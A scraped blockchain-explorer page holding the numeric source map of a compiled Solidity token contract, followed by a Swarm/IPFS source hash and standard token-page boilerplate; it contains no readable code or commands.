;;:21;;;;:::i;:::-;30017:41;;30077:57;30094:6;30102:9;30113;30124;30077:16;:57::i;:::-;29791:359;;;29765:385;29313:848;29221:947;;;:::o;10067:103::-;10118:4;10141:21;;;;;;;;;;;10134:28;;10067:103;:::o;23297:154::-;23406:4;;;;;;;;;;;:9;;;23416:6;23424:9;23435:6;23406:36;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;23297:154;;;:::o;3572:158::-;3630:7;3663:1;3658;:6;;3650:49;;;;;;;;;;;;:::i;:::-;;;;;;;;;3721:1;3717;:5;;;;:::i;:::-;3710:12;;3572:158;;;;:::o;30585:805::-;30764:18;30785:70;30792:12;30785:70;;;;;;;;;;;;;;;;;:6;:70::i;:::-;30764:91;;30887:1;30872:12;:16;;;:85;;;;;30946:11;30892:65;;:11;:22;30904:9;30892:22;;;;;;;;;;;;;;;:40;30930:1;30915:12;:16;;;;:::i;:::-;30892:40;;;;;;;;;;;;;;;:50;;;;;;;;;;;;:65;;;30872:85;30868:446;;;31023:8;30974:11;:22;30986:9;30974:22;;;;;;;;;;;;;;;:40;31012:1;30997:12;:16;;;;:::i;:::-;30974:40;;;;;;;;;;;;;;;:46;;:57;;;;30868:446;;;31103:33;;;;;;;;31114:11;31103:33;;;;;;31127:8;31103:33;;;31064:11;:22;31076:9;31064:22;;;;;;;;;;;;;;;:36;31087:12;31064:36;;;;;;;;;;;;;;;:72;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;31178:12;31159:31;;31174:1;31159:12;:16;;;;:::i;:::-;:31;;;31151:92;;;;;;;;;;;;:::i;:::-;;;;;;;;;31301:1;31286:12;:16;;;;:::i;:::-;31258:14;:25;31273:9;31258:25;;;;;;;;;;;;;;;;:44;;;;;;;;;;;;;;;;;;30868:446;31352:9;31331:51;;;31363:8;31373;31331:51;;;;;;;:::i;:::-;;;;;;;;30753:637;30585:805;;;;:::o;31657:161::-;31732:6;31763:5;31759:1;:9;31770:12;31751:32;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;31808:1;31794:16;;31657:161;;;;:::o;-1:-1:-1:-;;;;;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:77::-;3835:7;3864:5;3853:16;;3798:77;;;:::o;3881:118::-;3968:24;3986:5;3968:24;:::i;:::-;3963:3;3956:37;3881:118;;:::o;4005:222::-;4098:4;4136:2;4125:9;4121:18;4113:26;;4149:71;4217:1;4206:9;4202:17;4193:6;4149:71;:::i;:::-;4005:222;;;;:::o;4233:619::-;4310:6;4318;4326;4375:2;4363:9;4354:7;4350:23;4346:32;4343:119;;;4381:79;;:::i;:::-;4343:119;4501:1;4526:53;4571:7;4562:6;4551:9;4547:22;4526:53;:::i;:::-;4516:63;;4472:117;4628:2;4654:53;4699:7;4690:6;4679:9;4675:22;4654:53;:::i;:::-;4644:63;;4599:118;4756:2;4782:53;4827:7;4818:6;4807:9;4803:22;4782:53;:::i;:::-;4772:63;;4727:118;4233:619;;;;;:::o;4858:86::-;4893:7;4933:4;4926:5;4922:16;4911:27;;4858:86;;;:::o;4950:112::-;5033:22;5049:5;5033:22;:::i;:::-;5028:3;5021:35;4950:112;;:::o;5068:214::-;5157:4;5195:2;5184:9;5180:18;5172:26;;5208:67;5272:1;5261:9;5257:17;5248:6;5208:67;:::i;:::-;5068:214;;;;:::o;5288:329::-;5347:6;5396:2;5384:9;5375:7;5371:23;5367:32;5364:119;;;5402:79;;:::i;:::-;5364:119;5522:1;5547:53;5592:7;5583:6;5572:9;5568:22;5547:53;:::i;:::-;5537:63;;5493:117;5288:329;;;;:::o;5623:93::-;5659:7;5699:10;5692:5;5688:22;5677:33;;5623:93;;;:::o;5722:115::-;5807:23;5824:5;5807:23;:::i;:::-;5802:3;5795:36;5722:115;;:::o;5843:218::-;5934:4;5972:2;5961:9;5957:18;5949:26;;5985:69;6051:1;6040:9;6036:17;6027:6;5985:69;:::i;:::-;5843:218;;;;:::o;6067:118::-;6154:24;6172:5;6154:24;:::i;:::-;6149:3;6142:37;6067:118;;:::o;6191:222::-;6284:4;6322:2;6311:9;6307:18;6299:26;;6335:71;6403:1;6392:9;6388:17;6379:6;6335:71;:::i;:::-;6191:222;;;;:::o;6419:765::-;6505:6;6513;6521;6529;6578:3;6566:9;6557:7;6553:23;6549:33;6546:120;;;6585:79;;:::i;:::-;6546:120;6705:1;6730:53;6775:7;6766:6;6755:9;6751:22;6730:53;:::i;:::-;6720:63;;6676:117;6832:2;6858:53;6903:7;6894:6;6883:9;6879:22;6858:53;:::i;:::-;6848:63;;6803:118;6960:2;6986:53;7031:7;7022:6;7011:9;7007:22;6986:53;:::i;:::-;6976:63;;6931:118;7088:2;7114:53;7159:7;7150:6;7139:9;7135:22;7114:53;:::i;:::-;7104:63;;7059:118;6419:765;;;;;;;:::o;7190:474::-;7258:6;7266;7315:2;7303:9;7294:7;7290:23;7286:32;7283:119;;;7321:79;;:::i;:::-;7283:119;7441:1;7466:53;7511:7;7502:6;7491:9;7487:22;7466:53;:::i;:::-;7456:63;;7412:117;7568:2;7594:53;7639:7;7630:6;7619:9;7615:22;7594:53;:::i;:::-;7584:63;;7539:118;7190:474;;;;;:::o;7670:120::-;7742:23;7759:5;7742:23;:::i;:::-;7735:5;7732:34;7722:62;;7780:1;7777;7770:12;7722:62;7670:120;:::o;7796:137::-;7841:5;7879:6;7866:20;7857:29;;7895:32;7921:5;7895:32;:::i;:::-;7796:137;;;;:::o;7939:472::-;8006:6;8014;8063:2;8051:9;8042:7;8038:23;8034:32;8031:119;;;8069:79;;:::i;:::-;8031:119;8189:1;8214:53;8259:7;8250:6;8239:9;8235:22;8214:53;:::i;:::-;8204:63;;8160:117;8316:2;8342:52;8386:7;8377:6;8366:9;8362:22;8342:52;:::i;:::-;8332:62;;8287:117;7939:472;;;;;:::o;8417:328::-;8536:4;8574:2;8563:9;8559:18;8551:26;;8587:69;8653:1;8642:9;8638:17;8629:6;8587:69;:::i;:::-;8666:72;8734:2;8723:9;8719:18;8710:6;8666:72;:::i;:::-;8417:328;;;;;:::o;8751:180::-;8799:77;8796:1;8789:88;8896:4;8893:1;8886:15;8920:4;8917:1;8910:15;8937:320;8981:6;9018:1;9012:4;9008:12;8998:22;;9065:1;9059:4;9055:12;9086:18;9076:81;;9142:4;9134:6;9130:17;9120:27;;9076:81;9204:2;9196:6;9193:14;9173:18;9170:38;9167:84;;9223:18;;:::i;:::-;9167:84;8988:269;8937:320;;;:::o;9263:182::-;9403:34;9399:1;9391:6;9387:14;9380:58;9263:182;:::o;9451:366::-;9593:3;9614:67;9678:2;9673:3;9614:67;:::i;:::-;9607:74;;9690:93;9779:3;9690:93;:::i;:::-;9808:2;9803:3;9799:12;9792:19;;9451:366;;;:::o;9823:419::-;9989:4;10027:2;10016:9;10012:18;10004:26;;10076:9;10070:4;10066:20;10062:1;10051:9;10047:17;10040:47;10104:131;10230:4;10104:131;:::i;:::-;10096:139;;9823:419;;;:::o;10248:220::-;10388:34;10384:1;10376:6;10372:14;10365:58;10457:3;10452:2;10444:6;10440:15;10433:28;10248:220;:::o;10474:366::-;10616:3;10637:67;10701:2;10696:3;10637:67;:::i;:::-;10630:74;;10713:93;10802:3;10713:93;:::i;:::-;10831:2;10826:3;10822:12;10815:19;;10474:366;;;:::o;10846:419::-;11012:4;11050:2;11039:9;11035:18;11027:26;;11099:9;11093:4;11089:20;11085:1;11074:9;11070:17;11063:47;11127:131;11253:4;11127:131;:::i;:::-;11119:139;;10846:419;;;:::o;11271:180::-;11319:77;11316:1;11309:88;11416:4;11413:1;11406:15;11440:4;11437:1;11430:15;11457:200;11496:4;11516:19;11533:1;11516:19;:::i;:::-;11511:24;;11549:19;11566:1;11549:19;:::i;:::-;11544:24;;11592:1;11589;11585:9;11577:17;;11616:10;11610:4;11607:20;11604:46;;;11630:18;;:::i;:::-;11604:46;11457:200;;;;:::o;11663:180::-;11711:77;11708:1;11701:88;11808:4;11805:1;11798:15;11832:4;11829:1;11822:15;11849:182;11888:1;11905:19;11922:1;11905:19;:::i;:::-;11900:24;;11938:19;11955:1;11938:19;:::i;:::-;11933:24;;11976:1;11966:35;;11981:18;;:::i;:::-;11966:35;12023:1;12020;12016:9;12011:14;;11849:182;;;;:::o;12037:442::-;12186:4;12224:2;12213:9;12209:18;12201:26;;12237:71;12305:1;12294:9;12290:17;12281:6;12237:71;:::i;:::-;12318:72;12386:2;12375:9;12371:18;12362:6;12318:72;:::i;:::-;12400;12468:2;12457:9;12453:18;12444:6;12400:72;:::i;:::-;12037:442;;;;;;:::o;12485:225::-;12625:34;12621:1;12613:6;12609:14;12602:58;12694:8;12689:2;12681:6;12677:15;12670:33;12485:225;:::o;12716:366::-;12858:3;12879:67;12943:2;12938:3;12879:67;:::i;:::-;12872:74;;12955:93;13044:3;12955:93;:::i;:::-;13073:2;13068:3;13064:12;13057:19;;12716:366;;;:::o;13088:419::-;13254:4;13292:2;13281:9;13277:18;13269:26;;13341:9;13335:4;13331:20;13327:1;13316:9;13312:17;13305:47;13369:131;13495:4;13369:131;:::i;:::-;13361:139;;13088:419;;;:::o;13513:223::-;13653:34;13649:1;13641:6;13637:14;13630:58;13722:6;13717:2;13709:6;13705:15;13698:31;13513:223;:::o;13742:366::-;13884:3;13905:67;13969:2;13964:3;13905:67;:::i;:::-;13898:74;;13981:93;14070:3;13981:93;:::i;:::-;14099:2;14094:3;14090:12;14083:19;;13742:366;;;:::o;14114:419::-;14280:4;14318:2;14307:9;14303:18;14295:26;;14367:9;14361:4;14357:20;14353:1;14342:9;14338:17;14331:47;14395:131;14521:4;14395:131;:::i;:::-;14387:139;;14114:419;;;:::o;14539:221::-;14679:34;14675:1;14667:6;14663:14;14656:58;14748:4;14743:2;14735:6;14731:15;14724:29;14539:221;:::o;14766:366::-;14908:3;14929:67;14993:2;14988:3;14929:67;:::i;:::-;14922:74;;15005:93;15094:3;15005:93;:::i;:::-;15123:2;15118:3;15114:12;15107:19;;14766:366;;;:::o;15138:419::-;15304:4;15342:2;15331:9;15327:18;15319:26;;15391:9;15385:4;15381:20;15377:1;15366:9;15362:17;15355:47;15419:131;15545:4;15419:131;:::i;:::-;15411:139;;15138:419;;;:::o;15563:194::-;15603:4;15623:20;15641:1;15623:20;:::i;:::-;15618:25;;15657:20;15675:1;15657:20;:::i;:::-;15652:25;;15701:1;15698;15694:9;15686:17;;15725:1;15719:4;15716:11;15713:37;;;15730:18;;:::i;:::-;15713:37;15563:194;;;;:::o;15763:191::-;15803:3;15822:20;15840:1;15822:20;:::i;:::-;15817:25;;15856:20;15874:1;15856:20;:::i;:::-;15851:25;;15899:1;15896;15892:9;15885:16;;15920:3;15917:1;15914:10;15911:36;;;15927:18;;:::i;:::-;15911:36;15763:191;;;;:::o;15960:177::-;16100:29;16096:1;16088:6;16084:14;16077:53;15960:177;:::o;16143:366::-;16285:3;16306:67;16370:2;16365:3;16306:67;:::i;:::-;16299:74;;16382:93;16471:3;16382:93;:::i;:::-;16500:2;16495:3;16491:12;16484:19;;16143:366;;;:::o;16515:419::-;16681:4;16719:2;16708:9;16704:18;16696:26;;16768:9;16762:4;16758:20;16754:1;16743:9;16739:17;16732:47;16796:131;16922:4;16796:131;:::i;:::-;16788:139;;16515:419;;;:::o;16940:224::-;17080:34;17076:1;17068:6;17064:14;17057:58;17149:7;17144:2;17136:6;17132:15;17125:32;16940:224;:::o;17170:366::-;17312:3;17333:67;17397:2;17392:3;17333:67;:::i;:::-;17326:74;;17409:93;17498:3;17409:93;:::i;:::-;17527:2;17522:3;17518:12;17511:19;;17170:366;;;:::o;17542:419::-;17708:4;17746:2;17735:9;17731:18;17723:26;;17795:9;17789:4;17785:20;17781:1;17770:9;17766:17;17759:47;17823:131;17949:4;17823:131;:::i;:::-;17815:139;;17542:419;;;:::o;17967:222::-;18107:34;18103:1;18095:6;18091:14;18084:58;18176:5;18171:2;18163:6;18159:15;18152:30;17967:222;:::o;18195:366::-;18337:3;18358:67;18422:2;18417:3;18358:67;:::i;:::-;18351:74;;18434:93;18523:3;18434:93;:::i;:::-;18552:2;18547:3;18543:12;18536:19;;18195:366;;;:::o;18567:419::-;18733:4;18771:2;18760:9;18756:18;18748:26;;18820:9;18814:4;18810:20;18806:1;18795:9;18791:17;18784:47;18848:131;18974:4;18848:131;:::i;:::-;18840:139;;18567:419;;;:::o;18992:180::-;19132:32;19128:1;19120:6;19116:14;19109:56;18992:180;:::o;19178:366::-;19320:3;19341:67;19405:2;19400:3;19341:67;:::i;:::-;19334:74;;19417:93;19506:3;19417:93;:::i;:::-;19535:2;19530:3;19526:12;19519:19;;19178:366;;;:::o;19550:419::-;19716:4;19754:2;19743:9;19739:18;19731:26;;19803:9;19797:4;19793:20;19789:1;19778:9;19774:17;19767:47;19831:131;19957:4;19831:131;:::i;:::-;19823:139;;19550:419;;;:::o;19975:197::-;20014:3;20033:19;20050:1;20033:19;:::i;:::-;20028:24;;20066:19;20083:1;20066:19;:::i;:::-;20061:24;;20108:1;20105;20101:9;20094:16;;20131:10;20126:3;20123:19;20120:45;;;20145:18;;:::i;:::-;20120:45;19975:197;;;;:::o;20178:235::-;20318:34;20314:1;20306:6;20302:14;20295:58;20387:18;20382:2;20374:6;20370:15;20363:43;20178:235;:::o;20419:366::-;20561:3;20582:67;20646:2;20641:3;20582:67;:::i;:::-;20575:74;;20658:93;20747:3;20658:93;:::i;:::-;20776:2;20771:3;20767:12;20760:19;;20419:366;;;:::o;20791:419::-;20957:4;20995:2;20984:9;20980:18;20972:26;;21044:9;21038:4;21034:20;21030:1;21019:9;21015:17;21008:47;21072:131;21198:4;21072:131;:::i;:::-;21064:139;;20791:419;;;:::o;21216:332::-;21337:4;21375:2;21364:9;21360:18;21352:26;;21388:71;21456:1;21445:9;21441:17;21432:6;21388:71;:::i;:::-;21469:72;21537:2;21526:9;21522:18;21513:6;21469:72;:::i;:::-;21216:332;;;;;:::o
Swarm Source
ipfs://8638fb8578cb625921b4e32d8c49a570caf22772e999638675691fa63f332d20
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.